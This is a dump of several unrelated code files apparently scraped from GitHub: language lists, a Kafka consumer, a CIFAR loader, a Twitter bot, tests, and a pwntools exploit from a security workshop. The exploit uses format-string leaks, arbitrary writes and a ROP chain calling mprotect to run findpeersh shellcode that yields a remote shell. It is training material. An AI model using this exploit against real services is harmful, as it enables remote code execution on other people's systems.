value'])\nplt.tight_layout()\nplt.show()","repo_name":"aduxhi/learnpython","sub_path":"load_pre2.py","file_name":"load_pre2.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"18609264806","text":"# This is the list of language codes with the 'modern' level of support in CLDR\n# (compared to 'full', which contains many more languages). We use this as the\n# list of languages that we store specific name-to-code mappings for.\n\nCLDR_LANGUAGES = {\n 'af',\n 'am',\n 'ar',\n 'az',\n 'be',\n 'bg',\n 'bn',\n 'bs',\n 'ca',\n 'cs',\n 'cy',\n 'da',\n 'de',\n 'el',\n 'en',\n 'es',\n 'et',\n 'eu',\n 'fa',\n 'fi',\n 'fil',\n 'fo',\n 'fr',\n 'ga',\n 'gl',\n 'gu',\n 'he',\n 'hi',\n 'hr',\n 'hu',\n 'hy',\n 'id',\n 'is',\n 'it',\n 'ja',\n 'ka',\n 'kk',\n 'km',\n 'kn',\n 'ko',\n 'ky',\n 'lo',\n 'lt',\n 'lv',\n 'mk',\n 'ml',\n 'mn',\n 'mr',\n 'ms',\n 'my',\n 'nb',\n 'ne',\n 'nl',\n 'pa',\n 'pl',\n 'pt',\n 'ro',\n 'ru',\n 'si',\n 'sk',\n 'sl',\n 'sq',\n 'sr',\n 'sv',\n 'sw',\n 'ta',\n 'te',\n 'th',\n 'ti',\n 'to',\n 'tr',\n 'uk',\n 'und',\n 'ur',\n 'uz',\n 'vi',\n 'yue',\n 'zh',\n 'zu',\n}\n\n\n# These are the names of the languages that have the most entries on the English and\n# German Wiktionaries. 
Wiktionary only consistently identifies languages by their\n# name, making it important to be able to recognize the names.\n#\n# These lists of names are used in `tests/test_wikt_languages.py`.\nWIKT_LANGUAGE_NAMES = {}\n\nWIKT_LANGUAGE_NAMES['en'] = [\n \"Spanish\",\n \"French\",\n \"Latvian\",\n \"Latin\",\n \"English\",\n \"Mandarin\",\n \"Italian\",\n \"Portuguese\",\n \"Cantonese\",\n \"Japanese\",\n \"German\",\n \"Swedish\",\n \"Korean\",\n \"Serbo-Croatian\",\n \"Serbian\",\n \"Croatian\",\n \"Bosnian\",\n \"Finnish\",\n \"Vietnamese\",\n \"Dutch\",\n \"Galician\",\n \"Catalan\",\n \"Polish\",\n \"Danish\",\n \"Norwegian Nynorsk\",\n \"Turkish\",\n \"Romanian\",\n \"Lithuanian\",\n \"Ido\",\n \"Old French\",\n \"Czech\",\n \"Norwegian\",\n # Jèrriais -- same as Norman\n \"Esperanto\",\n \"Icelandic\",\n # Old Armenian\n \"Norwegian Bokmål\",\n \"Asturian\",\n \"Hungarian\",\n \"Proto-Germanic\",\n \"Russian\",\n \"Slovene\",\n \"Min Nan\",\n \"Scottish Gaelic\",\n \"Greek\",\n \"Irish\",\n \"Lojban\",\n \"Middle French\",\n \"Malay\",\n \"Luxembourgish\",\n \"Slovak\",\n \"Estonian\",\n \"Persian\",\n \"Venetian\",\n \"Old English\",\n \"Volapük\",\n \"Ladin\",\n \"Faroese\",\n \"Scots\",\n \"Interlingua\",\n \"Romansch\",\n \"Urdu\",\n # Middle Chinese\n \"Indonesian\",\n \"Swahili\",\n \"Middle English\",\n \"Occitan\",\n \"Welsh\",\n \"Old Norse\",\n \"Albanian\",\n \"Old Irish\",\n \"Old Saxon\",\n \"Lower Sorbian\",\n \"Afrikaans\",\n \"Ukrainian\",\n \"Proto-Slavic\",\n \"Ancient Greek\",\n \"Gothic\",\n \"Hawaiian\",\n \"Kurdish\",\n \"Tagalog\",\n \"Old High German\",\n \"Crimean Tatar\",\n \"Manx\",\n \"Sanskrit\",\n \"Hiligaynon\",\n \"West Frisian\",\n \"Hebrew\",\n \"Tok Pisin\",\n \"Proto-Indo-European\",\n \"Macedonian\",\n \"Novial\",\n \"Armenian\",\n \"Arabic\",\n \"Maltese\",\n \"Hakka\",\n \"Sicilian\",\n \"Ladino\",\n \"Basque\",\n \"Breton\",\n # Guernésiais -- same as Norman\n \"Vai\",\n \"Navajo\",\n \"Azeri\",\n \"Vilamovian\",\n # Tarantino\n \"Maori\",\n \"Friulian\",\n \"Hausa\",\n \"Haitian Creole\",\n \"Yiddish\",\n \"Tatar\",\n \"Proto-Malayo-Polynesian\",\n \"Aromanian\",\n \"Ottoman Turkish\",\n \"Old Provençal\",\n \"Northern Sami\",\n \"Dalmatian\",\n \"Bulgarian\",\n \"Neapolitan\",\n \"Cornish\",\n \"Middle Dutch\",\n \"Rapa Nui\",\n # Old Portuguese\n \"Egyptian Arabic\",\n \"Romani\",\n \"Tahitian\",\n \"Thai\",\n \"Limburgish\",\n \"Karelian\",\n \"Tajik\",\n \"Turkmen\",\n \"Kabardian\",\n \"Uzbek\",\n \"Samoan\",\n \"Mongolian\",\n \"Zulu\",\n \"Upper Sorbian\",\n \"Walloon\",\n # Proto-Finnic\n \"Frankish\",\n \"Mapudungun\",\n \"Pashto\",\n \"Low German\",\n \"Bashkir\",\n \"Kashubian\",\n \"Sranan Tongo\",\n \"Proto-Sino-Tibetan\",\n \"Norman\",\n \"Proto-Austronesian\",\n \"Marathi\",\n \"Rohingya\",\n \"Classical Nahuatl\",\n # Proto-Malayic\n # German Low German\n \"Fijian\",\n \"Zazaki\",\n \"Proto-Italic\",\n \"Old Dutch\",\n \"Egyptian\",\n \"Old Frisian\",\n \"Greenlandic\",\n \"Burmese\",\n \"Votic\",\n \"Ewe\",\n \"Cherokee\",\n \"Old Church Slavonic\",\n \"Quechua\",\n \"Mirandese\",\n \"Livonian\",\n \"Bengali\",\n \"Skolt Sami\",\n # Proto-Balto-Slavic\n \"Pitjantjatjara\",\n \"Georgian\",\n \"North Frisian\",\n \"Tetum\",\n \"Tongan\",\n # Mauritian Creole\n \"Torres Strait Creole\",\n \"Papiamentu\",\n \"Lao\",\n \"Malagasy\",\n \"Interlingue\",\n \"Aragonese\",\n \"Istriot\",\n \"Sumerian\",\n \"Proto-Celtic\",\n \"Võro\",\n # Proto-Polynesian\n \"Nepali\",\n \"Chickasaw\",\n \"Akkadian\",\n \"Middle Armenian\",\n 
\"Cimbrian\",\n \"Somali\",\n \"Sardinian\",\n \"Tocharian B\",\n \"Telugu\",\n \"Javanese\",\n \"Taos\",\n \"Proto-Semitic\",\n # Old Prussian\n \"Kyrgyz\",\n \"Corsican\",\n \"Veps\",\n \"Baluchi\",\n \"Middle Low German\",\n \"Middle High German\",\n \"Uyghur\",\n # Dutch Low Saxon\n \"Belarusian\",\n \"Guaraní\",\n \"Undetermined\",\n \"Inuktitut\",\n \"Tocharian A\",\n \"Nigerian Pidgin\",\n # Gallo\n # Saterland Frisian\n \"Punjabi\",\n \"Proto-Algonquian\",\n # Istro-Romanian\n \"Wiradhuri\",\n \"Sichuan Yi\",\n \"Wu\",\n # White Hmong\n \"Ugaritic\",\n \"Sundanese\",\n # Old East Slavic\n # Fala\n # Elfdalian\n \"Tamil\",\n \"Pijin\",\n \"Okinawan\",\n \"Kazakh\",\n \"Hindi\",\n \"Tuvan\",\n \"Polabian\",\n \"Aramaic\",\n \"Malayalam\",\n \"Kumyk\",\n \"Inari Sami\",\n \"Ilocano\",\n \"Tswana\",\n \"Libyan Arabic\",\n \"Latgalian\",\n \"Yakut\",\n \"Sindhi\",\n \"Khmer\",\n \"Gamilaraay\",\n \"Ojibwe\",\n \"Choctaw\",\n \"Chinese\",\n \"Chamorro\",\n \"Yucatec Maya\",\n \"Picard\",\n \"Ngarrindjeri\",\n \"Kott\",\n \"Ingrian\",\n # Crimean Gothic\n \"Chamicuro\",\n \"Rajasthani\",\n # Old Tupi\n \"Old Spanish\",\n \"Gagauz\",\n \"Extremaduran\",\n \"Chinook Jargon\",\n \"Cahuilla\",\n \"Kannada\",\n \"Iban\",\n \"American Sign Language\",\n \"Adyghe\",\n \"Warlpiri\",\n \"Tibetan\",\n \"Ossetian\",\n \"Meriam\",\n \"Marshallese\",\n \"Khakas\",\n \"Balinese\",\n \"Zhuang\",\n \"Tuvaluan\",\n \"Niuean\",\n \"Martuthunira\",\n \"Guugu Yimidhirr\",\n \"Chechen\",\n \"Campidanese Sardinian\",\n \"Tolai\",\n # Old Javanese\n \"Nahuatl\",\n \"Lombard\",\n \"West Coast Bajau\",\n \"Romagnol\",\n \"Middle Irish\",\n \"Yoruba\",\n \"Wangaaybuwan-Ngiyambaa\",\n # Old Swedish\n \"Lingala\",\n \"Fiji Hindi\",\n \"Shabo\",\n \"Sasak\",\n \"Judeo-Arabic\",\n \"Central Kurdish\",\n \"Bislama\",\n]\n\nWIKT_LANGUAGE_NAMES['de'] = [\n \"Deutsch\",\n \"Englisch\",\n \"Polnisch\",\n \"Italienisch\",\n \"Französisch\",\n \"Esperanto\",\n \"Schwedisch\",\n \"Lateinisch\",\n \"Tschechisch\",\n \"Katalanisch\",\n \"Spanisch\",\n \"Okzitanisch\",\n \"Ungarisch\",\n \"Litauisch\",\n \"Finnisch\",\n \"Russisch\",\n \"Altgriechisch\",\n \"Niederländisch\",\n \"Kurdisch\",\n \"Baskisch\",\n \"Armenisch\",\n \"Isländisch\",\n \"Bulgarisch\",\n \"Färöisch\",\n \"Dänisch\",\n \"Portugiesisch\",\n \"Slowakisch\",\n \"Türkisch\",\n \"Maori\",\n \"Albanisch\",\n \"Japanisch\",\n \"Norwegisch\",\n \"Irisch\",\n \"Koreanisch\",\n \"Chinesisch\",\n \"Venezianisch\",\n \"Friaulisch\",\n \"Serbisch\",\n \"Indonesisch\",\n \"Walisisch\",\n \"Arabisch\",\n \"Zentral-Nahuatl\",\n \"Neugriechisch\",\n \"Sumerisch\",\n \"Obersorbisch\",\n \"Sesotho\",\n \"Rumänisch\",\n \"Suaheli\",\n \"Persisch\",\n \"Krimtatarisch\",\n \"Plattdeutsch\",\n \"Prußisch\",\n \"Thai\",\n \"Bosnisch\",\n \"Sardisch\",\n \"Maltesisch\",\n \"Akkadisch\",\n \"Hawaiianisch\",\n \"Hebräisch\",\n \"Gotisch\",\n \"Afrikaans\",\n \"Rätoromanisch\",\n \"Tamil\",\n \"Bretonisch\",\n \"Ukrainisch\",\n \"Hindi\",\n \"Georgisch\",\n \"Panjabi\",\n \"Papiamentu\",\n \"Slowenisch\",\n \"Nauruisch\",\n \"Schottisch-Gälisch\",\n \"Balinesisch\",\n \"Estnisch\",\n \"Manx\",\n \"Korsisch\",\n # \"Frühneuhochdeutsch\",\n \"Lettisch\",\n \"isiZulu\",\n \"Tagalog\",\n \"Tok Pisin\",\n # \"Südpikenisch\",\n \"Kroatisch\",\n \"Niedersorbisch\",\n \"Kannada\",\n \"Guanche\",\n \"Weißrussisch\",\n \"Sanskrit\",\n \"Aserbaidschanisch\",\n \"Mittelhochdeutsch\",\n \"Laotisch\",\n \"Altnordisch\",\n \"Altenglisch\",\n \"Vietnamesisch\",\n \"Tadschikisch\",\n 
\"Samoanisch\",\n \"Mazedonisch\",\n \"Luxemburgisch\",\n \"Hethitisch\",\n # \"Yukatekisch\",\n \"Kaschubisch\",\n \"Wallonisch\",\n # \"Klassisches Nahuatl\",\n \"Telugu\",\n \"Rapanui\",\n \"Jiddisch\",\n \"Ido\",\n # \"Galicisch\",\n \"Volapük\",\n \"Bengalisch\",\n \"Mapudungun\",\n \"Lojban\",\n \"Tuvaluisch\",\n \"Gujarati\",\n \"Assamesisch\",\n]\n","repo_name":"SickGear/SickGear","sub_path":"lib/langcodes/language_lists.py","file_name":"language_lists.py","file_ext":"py","file_size_in_byte":8650,"program_lang":"python","lang":"en","doc_type":"code","stars":629,"dataset":"github-code","pt":"38"} +{"seq_id":"2881625826","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom pwn import *\n\ncontext(arch=\"i386\", os=\"linux\")\n\nSHELLCODE = asm(shellcraft.findpeersh())\n\nr = remote('localhost', 20002)\nr.readline()\n\n# Canary = %134$\n# ebp (0xffd2da98) = %137$\n# ret addr (0x56557d4b) = %138$\n# socket = %139$\n\n# fmt base (0x56557000) = ret_addr - 0xd4b\n# buffer addr (0xffd2d86c) = ebp - 556\n# addr of ret (0xffd2da7c) = ebp - 28\n\nr.sendline(flat(\n '%134$08x', # Canary\n '%137$08x', # EBP1\n '%138$08x', # ret addr\n '%139$08x', # socket\n '%145$08x', # EBP2\n '%157$08x' # EBP3\n))\n\ncanary = int(r.recv(8), 16)\nebp1 = int(r.recv(8), 16)\nret = int(r.recv(8), 16)\nsocket = int(r.recv(8), 16)\nebp2 = int(r.recv(8), 16)\nebp3 = int(r.recv(8), 16)\nfmt_base = ret - 0xd4b\nbuffer = ebp1 - 556\nret_addr = ebp1 - 28\nr.recvline()\n\ndef send_receive(fmt):\n r.sendline(fmt)\n return r.recvline()\n\ndef make_pointer(addr):\n send_receive('A' * ((ebp2 & 0xff) + 0) + '%137$hhn')\n send_receive('A' * ((addr >> 0) & 0xff) + '%145$hhn')\n\n send_receive('A' * ((ebp2 & 0xff) + 1) + '%137$hhn')\n send_receive('A' * ((addr >> 8) & 0xff) + '%145$hhn')\n\n send_receive('A' * ((ebp2 & 0xff) + 2) + '%137$hhn')\n send_receive('A' * ((addr >> 16) & 0xff) + '%145$hhn')\n\n send_receive('A' * ((ebp2 & 0xff) + 3) + '%137$hhn')\n send_receive('A' * ((addr >> 24) & 0xff) + '%145$hhn')\n\ndef poke(addr, data):\n for i in range(len(data)):\n make_pointer(addr + i)\n send_receive('A' * data[i] + '%157$hhn')\n\ndef peek(addr):\n make_pointer(addr)\n r.sendline('%157$sTHE_END')\n return r.recvuntil('THE_END\\n')[:-8] + b'\\0'\n\nPAGE_SIZE = 0x1000\nPAGE_MASK = ~(PAGE_SIZE-1)\nshellcode = asm(shellcraft.findpeersh())\nshellcode_addr = ebp3 + 4\n\nadd_esp_76 = fmt_base + 0x00000d13 # add esp, 0x44 ; pop ebx ; pop ebp ; ret\npop2 = fmt_base + 0x00000928 # pop ebx ; pop ebp ; ret\nint_80 = fmt_base + 0x00000e88 # int 0x80 ; ret\npop_ebx = fmt_base + 0x00000739 # pop ebx ; ret\npop_eax = fmt_base + 0x00000d7b # pop eax ; ret\nles_ecx = fmt_base + 0x00000737 # les ecx, ptr [eax] ; pop ebx ; ret\nlea_edx = fmt_base + 0x00000a06 # lea edx, dword ptr [ebx - 0x110] ; mov dword ptr [esp], edx ; call eax\n\n\n# Value to put into ecx:es\npoke(fmt_base + 0x3000, p32(PAGE_SIZE) + b'\\0\\0')\n# Gadget to pivot the stack\npoke(ret_addr, p32(add_esp_76))\n# Shellcode\npoke(shellcode_addr, shellcode)\n\n# ROP chain\n# eax = SYS_mprotect\n# ebx = shellcode addr\n# ecx = len\n# edx = PROT_READ | PROT_WRITE | PROT_EXEC\npoke(ret_addr + 76 + 4, flat(\n #Put 7 into edx\n pop_ebx,\n (constants.PROT_READ | constants.PROT_WRITE | constants.PROT_EXEC) + 0x110,\n pop_eax,\n pop2,\n lea_edx,\n 0xdeadbeef,\n\n #Put 4096 into ecx AND address to mprotect into ebx\n pop_eax, # pop eax ; ret\n fmt_base + 0x3000, # ->eax\n les_ecx, # les ecx, ptr [eax] ; pop ebx ; ret\n shellcode_addr & PAGE_MASK, # address for mprotect must be on 
a page boundary\r\n\r\n pop_eax,\r\n int(constants.SYS_mprotect),\r\n int_80,\r\n shellcode_addr\r\n ))\r\n\r\nr.sendline('exit')\r\nr.interactive()\r\n","repo_name":"RobertLarsen/ProsaWorkshop","sub_path":"presentations/04-advanced-exploitation/assignments/solutions/opgave_9.py","file_name":"opgave_9.py","file_ext":"py","file_size_in_byte":3121,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"38"} +{"seq_id":"20397671119","text":"# -*- coding: utf-8 -*-\n\"\"\"Tests for the IWWB Searcher utility.\"\"\"\n\nfrom iwwb.eventlist.tests.base import IntegrationTestCase\nfrom iwwb.eventlist.interfaces import IIWWBSearcher\nfrom zope.component import getUtility\n\nimport mock\nimport unittest2 as unittest\n\n\nclass TestIWWBSearcherMocked(unittest.TestCase):\n \"\"\"Unit test on IWWBSearcher using mocked service results.\"\"\"\n\n @mock.patch('iwwb.eventlist.searcher.Client')\n def test_catch_exception_on_invalid_client(self, suds_client):\n \"\"\"Test that an exception is caught if suds.client.Client() raises one when\n trying to access an invalid SOAP client.\n \"\"\"\n from iwwb.eventlist.searcher import IWWBSearcher\n\n suds_client.return_value = None\n suds_client.side_effect = Exception('Invalid SUDS client')\n\n with self.assertRaises(Exception):\n IWWBSearcher()._get_service_client()\n\n @mock.patch('iwwb.eventlist.searcher.IWWBSearcher._get_service_client')\n def test_return_empty_list_for_empty_results(self, _get_service_client):\n \"\"\"An empty list must be returned if we get empty SearchResults.\"\"\"\n from iwwb.eventlist.searcher import IWWBSearcher\n\n # IWWB service returns '' if it doesn't find any results\n _get_service_client.return_value.service.GetFullResult.return_value.SearchResults = ''\n\n self.assertEquals(IWWBSearcher().get_results(dict(query='foo')), [])\n\n\nclass TestIWWBSearcherIntegration(IntegrationTestCase):\n \"\"\"Integration test for the IWWBSearcher utility that actually calls the\n service and asserts results.\n \"\"\"\n\n def setUp(self):\n \"\"\"Custom shared utility setup for tests.\"\"\"\n self.portal = self.layer['portal']\n self.searcher = getUtility(IIWWBSearcher)\n self.searcher.results_per_page = 2\n\n def test_get_results_empty(self):\n # Search for events in a city that doesn't exist\n query = dict(city='FooBar')\n self.assertEquals(self.searcher.get_results(query), [])\n\n def test_get_results_not_empty(self):\n # This search should return some results\n query = dict(city='Berlin')\n self.assertGreater(len(self.searcher.get_results(query)), 0)\n\n def test_get_results_format(self):\n query = dict(city='Berlin')\n results = self.searcher.get_results(query)\n result = results[0]\n\n # See if we can access the attribute values for a result (we can't test\n # other attributes because they are not mandatory); this should not\n # raise an AttributeError.\n result.Rank\n result.Type\n\n def test_get_results_false_parameters(self):\n # Try searching with a nonexistent parameter, the method should fail\n query = dict(foo='bar')\n try:\n self.searcher.get_results(query)\n except:\n pass\n else:\n self.fail(\"get_results did not raise an Exception!\")\n\n\ndef test_suite():\n \"\"\"This sets up a test suite that actually runs the tests in the class\n above.\"\"\"\n return 
unittest.defaultTestLoader.loadTestsFromName(__name__)\n","repo_name":"collective/iwwb.eventlist","sub_path":"src/iwwb/eventlist/tests/test_searcher.py","file_name":"test_searcher.py","file_ext":"py","file_size_in_byte":3088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"34222842632","text":"import socket\nfrom confluent_kafka import Consumer\nimport json\nimport pandas as pd\nfrom io import StringIO\nimport os\nimport sys\nimport psycopg2\nfrom psycopg2 import sql\n\nconf = {'bootstrap.servers':'172.18.0.3:9092',\n 'group.id':\"topic-to-staging\"}\n\nconsumer1 = Consumer(conf)\n\ndef consumer_func(consumer,topics,max_messages=17000):\n data = []\n message_count = 0\n try:\n consumer.subscribe(topics)\n\n while message_count < max_messages:\n msg = consumer.poll(timeout=1.0)\n if msg is None: continue\n if msg.error():\n print(\"message has an error\")\n else:\n json_data = msg.value().decode('utf-8')\n\n python_dict = json.loads(json_data)\n\n data.append(python_dict)\n\n message_count += 1\n except Exception as e:\n # You can decide here what to do when an error occurs.\n print(f'An error occurred: {e}')\n return None\n finally:\n consumer.close()\n return pd.DataFrame(data)\n\n\ncr_table_sql_script = (f\"CREATE TABLE IF NOT EXISTS staging.example\" +\n \"(Country varchar(200) NULL , Month varchar(50) NULL , Year int NULL, Visitor float NULL);\")\n\n\ndef write_dataframe_to_postgres(dataframe, schema_name='staging', table_name='example'):\n\n try:\n # Connect to the database\n connection = psycopg2.connect(\n host=\"localhost\",\n user=\"postgres\",\n password=\"1234\",\n database=\"postgres\"\n )\n\n # Convert the DataFrame to CSV format\n csv_data = dataframe.to_csv(index=False, header=False)\n\n # Write the CSV data into an in-memory buffer\n csv_buffer = StringIO()\n csv_buffer.write(csv_data)\n csv_buffer.seek(0)\n\n # Create a cursor\n cursor = connection.cursor()\n cursor.execute(cr_table_sql_script)\n\n # Copy the CSV data into the PostgreSQL table\n copy_query = sql.SQL(\"COPY {}.{} FROM STDIN WITH CSV\").format(\n sql.Identifier(schema_name),\n sql.Identifier(table_name)\n )\n cursor.copy_expert(sql=copy_query, file=csv_buffer)\n connection.commit()\n print(\"DataFrame was successfully written to the database.\")\n\n except psycopg2.Error as e:\n print(f\"PSQL error: {e}\")\n\n finally:\n # Close the connection\n if 'connection' in locals():\n connection.close()\n\ndef main():\n try:\n dataframe = consumer_func(consumer=consumer1,topics=[\"staging\"],max_messages=17000)\n if dataframe is not None:\n # TRANSFORMATIONS ON THE DATAFRAME CAN BE DONE HERE.\n print(dataframe.head())\n write_dataframe_to_postgres(dataframe)\n else:\n print(\"An error occurred while reading data from the topic\")\n except Exception as e:\n print(f\"An error was received: {e}\")\n finally:\n # Close the consumer\n if consumer1 is not None:\n consumer1.close()\n\nif __name__ == '__main__':\n main()","repo_name":"afaruksargin/DataPipelineWithDockerAirflowKafka","sub_path":"py_script/consumer.py","file_name":"consumer.py","file_ext":"py","file_size_in_byte":3123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"37648568391","text":"# search_data.py\n# Construct and preprocess data for model\n\nimport torch\nimport torchvision\nfrom torchvision import transforms, datasets\nfrom utils import *\nimport os\nimport random\n\n'''\n Retrieve images from CIFAR-10 dataset using 
torchvision\n'''\ndef get_cifar_data():\n transform = transforms.Compose([\n transforms.Resize((224,224)),\n transforms.ToTensor(),\n transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010))\n ])\n\n trainset = torchvision.datasets.CIFAR10(root='../data', train=True, download=True, transform=transform)\n \n # Construct DataLoaders for training and test sets\n trainloader = torch.utils.data.DataLoader(trainset, batch_size=1, shuffle=False, num_workers=1)\n testset = torchvision.datasets.CIFAR10(root='../data', train=False, download=True, transform=transform)\n testloader = torch.utils.data.DataLoader(testset, batch_size=1, shuffle=False, num_workers=1)\n\n return trainloader, testloader, trainset\n\ndef index_dataset(trainset):\n feature_indexer = Indexer()\n add_dataset_features(trainset, feature_indexer)\n print(len(feature_indexer))\n\n'''\n Parse and retrieve data from train_path. Also construct an image indexer from index to image_path\n'''\ndef get_ml_data(train_path, train_cutoff=.95):\n indexer = Indexer()\n files = [os.path.join(train_path, p) for p in sorted(os.listdir(train_path))]\n for file in files:\n indexer.get_index(file)\n\n # Generate training and test set - 95% traning, 5% test\n a = [i for i in range(len(files))]\n random.shuffle(a)\n cutoff = int(len(files)*train_cutoff)\n train_data = a[:cutoff]\n test_data = a[cutoff:]\n return train_data, test_data, indexer","repo_name":"SanatSharma/RevSearch","sub_path":"search_data.py","file_name":"search_data.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"38"} +{"seq_id":"207776495","text":"import tweepy\r\nimport emojis\r\nimport random, io, time\r\n\r\nQTDEVENTOS = 3\r\nMAX_LINHAS = 5\r\n\r\narq = open(\"edicao.txt\", \"r\")\r\nfor linha in arq:\r\n edicao = linha\r\narq.close()\r\ntodosEmotes = []\r\nfrasesTXT = open(\"frases.txt\", \"r\")\r\nfrases = []\r\nfor linha in frasesTXT:\r\n frases.append(linha.strip())\r\nfrasesTXT.close()\r\ndesenhosTXT = io.open(\"desenhos.txt\", \"r\")\r\ndesenhos = []\r\nfor linha in desenhosTXT:\r\n desenhos.append(linha.strip())\r\nchavesTXT = open(\"chaves.txt\", \"r\")\r\nchaves = []\r\nfor linha in chavesTXT:\r\n chaves.append(linha.strip())\r\nprint(f'''\r\nConsumer key: {chaves[0]}\r\nConsumer secret: {chaves[1]}\r\nAccess key: {chaves[2]}\r\nAccess secret: {chaves[3]}\r\n\r\nChaves retiradas de 'chaves.txt'\r\nPara acessar as chaves vá em https://developer.twitter.com/en/apps\r\n''')\r\n\r\nconsumer_key = chaves[0]\r\nconsumer_secret = chaves[1]\r\naccess_key = chaves[2]\r\naccess_secret = chaves[3]\r\n\r\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\r\nauth.set_access_token(access_key, access_secret)\r\napi = tweepy.API(auth)\r\n\r\ndef esperar(tempo):\r\n print(f\"\\tAguardando {tempo} segundos\")\r\n time.sleep(tempo)\r\n\r\ndef tweetarXmin(texto, tempo):\r\n print(f\"\\tTweetando: \\n{texto}\")\r\n api.update_status(status = texto)\r\n esperar(tempo)\r\n\r\ndef tweetarXminReply(texto, tempo, tweet):\r\n print(f\"Respondendo o útlimo tweet:\\n{texto}\")\r\n api.update_status(status=texto, in_reply_to_status_id=tweet.id)\r\n esperar(tempo)\r\n\r\ndef removeDaListaVivos(lista1, lista2, morre):\r\n for linha in lista1:\r\n if (morre in linha):\r\n linha.remove(morre)\r\n lista2.remove(morre)\r\n return lista1, lista2\r\n\r\ndef anunciarMortos(mortesDoDia, participantesOriginais, participantesVivosLista, api):\r\n metade = False\r\n contador = 0\r\n statusText = ''\r\n 
if (len(mortesDoDia) > 0):\r\n if (len(mortesDoDia) == 1):\r\n i = 1\r\n for linha in participantesOriginais:\r\n if (mortesDoDia[0] in linha):\r\n statusText = f\"hoje fora ouvido apenas um tiro de canhão: \\n@{mortesDoDia[0]} do distrito {i}\\nserá isso bom ou ruim?\"\r\n break\r\n i += 1\r\n else:\r\n statusText = f'Hoje foram ouvidos {len(mortesDoDia)} tiros de canhão a distância:'\r\n for morto in mortesDoDia:\r\n statusText += f\"\\n@{morto} \"\r\n i = 1\r\n for linha in participantesOriginais:\r\n if (morto in linha):\r\n statusText += f\"do distrito {i}\"\r\n break\r\n i += 1\r\n contador += 1\r\n if (contador % MAX_LINHAS == 0):\r\n if (not metade):\r\n metade = True\r\n tweetarXmin(statusText, 10)\r\n else:\r\n tweet = api.user_timeline(screen_name=api.me().screen_name, count=1, tweet_mode='extended')[0]\r\n tweetarXminReply(statusText, 30 * contador, tweet)\r\n statusText = \"\"\r\n if (not contador % MAX_LINHAS == 0):\r\n if (metade):\r\n tweet = api.user_timeline(screen_name=api.me().screen_name, count=1, tweet_mode='extended')[0]\r\n if (len(participantesVivosLista) > 1):\r\n tweetarXminReply(statusText, min(30 * contador, 300), tweet)\r\n else:\r\n tweetarXminReply(statusText, min(30), tweet)\r\n statusText = \"\"\r\n else:\r\n if (len(participantesVivosLista) > 1):\r\n tweetarXmin(statusText, min(30 * contador, 300))\r\n else:\r\n tweetarXmin(statusText, 30)\r\n statusText = \"\"\r\n\r\ndef hungerGamesEvent():\r\n\r\n #region Post de inscrição dos tributos (+600 segs)\r\n statusText = f'''\r\nQUE COMECEM OS JOGOS VORAZES {edicao} \r\nPara participar comente algo nesse status, deixe seu grito de guerra, seu texto motivacional, qlqr coisa.\r\nVocê será notificado da sua participação\r\n\r\nRT/Fav pra fortalecer o bot <3\r\nAs inscrições terminam em 30 minutos\r\n#JogosVorazes\r\n'''\r\n arq = open(\"edicao.txt\", \"w\")\r\n arq.write(str(int(edicao) + 1))\r\n arq.close()\r\n tweetarXmin(statusText, 1800)\r\n # endregion\r\n\r\n print(\"Pegando nomes do último status\")\r\n tweet = api.user_timeline(screen_name=api.me().screen_name, count=1, tweet_mode='extended')[0]\r\n replies = tweepy.Cursor(api.search, q=f'to:@{api.me().screen_name}',result_type=\"recent\", since_id=tweet.id, tweet_mode='extended').items()\r\n #replies = tweepy.Cursor(api.search, q=f'to:@{api.me().screen_name}', since_id=tweet.id, tweet_mode='extended').items()\r\n participantesVivos = [[]]\r\n participantesOriginais = [[]]\r\n participantesVivosLista = []\r\n cont = 0\r\n i = 0\r\n '''\r\n while cont < 24:\r\n\r\n #region Juntando os participantes das respostas do ultimo tweet nos vetores de participantes\r\n try:\r\n for reply in replies:\r\n adicionado = False\r\n print(reply)\r\n for participante in participantesVivosLista:\r\n if(participante == reply.user.screen_name):\r\n adicionado = True\r\n break\r\n if (not adicionado):\r\n participantesVivosLista.append(reply.user.screen_name)\r\n reply = replies.next()\r\n # print(reply.user.screen_name)\r\n adicionado = False\r\n print(reply)\r\n for participante in participantesVivosLista:\r\n if(participante == reply.user.screen_name):\r\n adicionado = True\r\n break\r\n if(adicionado):\r\n continue\r\n participantesVivosLista.append(reply.user.screen_name)\r\n \r\n #cont += 1\r\n except:\r\n print(\"Não há mais replies\")\r\n break\r\n #endregion\r\n '''\r\n for reply in replies:\r\n adicionado = False\r\n print(reply)\r\n for participante in participantesVivosLista:\r\n if (participante == reply.user.screen_name):\r\n print(\"Participante já 
adicionado\")\r\n adicionado = True\r\n break\r\n if (not adicionado):\r\n participantesVivosLista.append(reply.user.screen_name)\r\n\r\n print(f\"Participantes: {participantesVivosLista}\")\r\n\r\n #region Juntando 24 pessoas aleatórias das que responderam o último tweet (pra não ser os primeiros)\r\n cont = 0\r\n i = 0\r\n if (len(participantesVivosLista) >= 24):\r\n participantesVivosLista = random.sample(participantesVivosLista, 24)\r\n for pessoa in participantesVivosLista:\r\n if (cont % 2 == 0):\r\n participantesVivos[i].append(pessoa)\r\n participantesOriginais[i].append(pessoa)\r\n else:\r\n participantesVivos[i].append(pessoa)\r\n participantesOriginais[i].append(pessoa)\r\n participantesVivos.append([])\r\n participantesOriginais.append([])\r\n i += 1\r\n cont += 1\r\n if (cont == 24):\r\n break\r\n else:\r\n for pessoa in participantesVivosLista:\r\n if (cont % 2 == 0):\r\n participantesVivos[i].append(pessoa)\r\n participantesOriginais[i].append(pessoa)\r\n else:\r\n participantesVivos[i].append(pessoa)\r\n participantesOriginais[i].append(pessoa)\r\n participantesVivos.append([])\r\n participantesOriginais.append([])\r\n i += 1\r\n cont += 1\r\n # endregion\r\n\r\n #region Adicionado listas predefinidas para testes\r\n #participantesVivos = 